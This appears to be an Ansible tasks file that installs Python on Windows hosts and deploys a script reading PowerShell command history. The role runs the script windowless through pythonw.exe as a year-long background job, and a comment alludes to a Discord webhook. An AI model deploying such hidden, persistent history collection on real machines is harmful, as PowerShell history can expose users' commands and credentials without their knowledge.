---
# tasks file for roles/deploy_py_logger
- name: Install Python 3.12
  ansible.windows.win_package:
    path: https://www.python.org/ftp/python/3.12.3/python-3.12.3-amd64.exe
    product_id: '{3c310467-33a7-47b3-858e-096773289047}'
    arguments: /quiet InstallAllUsers=1 PrependPath=1
    state: present
- name: Install Python libraries 
  ansible.windows.win_shell: pip install requests watchdog #doesn't need discord webhook

- name: Copy logger file
  ansible.windows.win_copy:
    src: ../../../src/simple_powershell_logger/read_powershell_history.py
    dest: "{{logger_install_path}}"
#change to be a service eventually 
- name: Execute Logger in background
  ansible.windows.win_shell: pythonw.exe {{logger_install_path}}
  async: 31536000  
  poll: 0



